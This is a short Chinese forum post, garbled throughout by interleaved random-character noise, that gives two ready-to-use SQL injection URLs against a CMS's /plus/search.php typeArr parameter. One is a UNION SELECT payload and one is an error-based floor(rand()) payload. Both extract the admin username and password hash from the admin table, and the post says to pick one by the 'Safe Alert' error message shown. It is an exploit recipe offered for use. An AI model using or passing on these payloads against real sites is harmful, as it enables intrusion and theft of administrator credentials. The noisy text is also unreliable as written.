4 B5 [' }% S$ Y6 s& k* F& E' n {Safe Alert: Request Error step 2 !/ H: n8 |1 g$ v" k
6 U: Z& x& Q1 C1 Z5 S/ l4 C那么直接用下面的exp ; m) h! p7 a/ I, E9 ^1 T , s. @$ h8 O6 sxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a 8 \( \: P8 a' u U& d X' ^5 c F& @0 b; a8 l" m% S- A
( @' ^! H, Q3 Q: `看结果如果提示+ g/ _9 ~# x% R
`( s. w# X6 o
Safe Alert: Request Error step 1 !# i2 ]+ C) R. B% j5 g% V2 B: j
& J' A p# l) C" U( S那么直接用下面的exp/ T. }4 g, Q2 \' r/ o
, `, h x, Z- f8 X
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a ( W8 ]8 {& ~! E, R1 K3 H% ~ / o4 L) K& ?9 a, i) E8 m8 O- ?+ `
如果正常显示证明漏洞不存在了。 * }$ ?; Q0 L ?- G$ a5 X0 J" H9 `% Q7 w
转载不加作者名的没JJ